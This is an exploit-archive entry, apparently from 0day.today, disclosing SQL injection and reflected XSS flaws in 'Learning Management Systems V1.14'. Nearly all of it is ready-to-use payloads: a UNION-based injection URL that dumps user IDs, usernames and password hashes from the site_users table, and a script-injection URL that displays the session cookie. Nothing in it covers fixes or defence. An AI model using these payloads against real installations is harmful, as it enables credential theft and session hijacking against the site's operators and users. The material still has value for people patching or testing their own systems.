id: 18713
date: 06/20/2012
title: Learning Management Systems V1.14 SQL Injection / XSS Vulnerabilties
author: AtT4CKxT3rR0r1ST
cves: 

Learning Management Systems V1.14 SQL Injection / XSS Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://learning-management-system.info/
#######################################################################

===[ Exploit ]===


Sql Injection
==============

http://localhost/index.php?sub=students&student_class=Sql

http://localhost/index.php?sub=students&student_class=null+and+1=2+union+select+1,group_concat(user_id,0x3a,user_name,0x3a,user_password),3,4,5,6,7,8+from+site_users




Reflected Xss
==============


http://localhost/index.php?sub=students&student_class=><script>alert(document.cookie)</script>

####################################################################### 



#  0day.today [2023-03-26]  #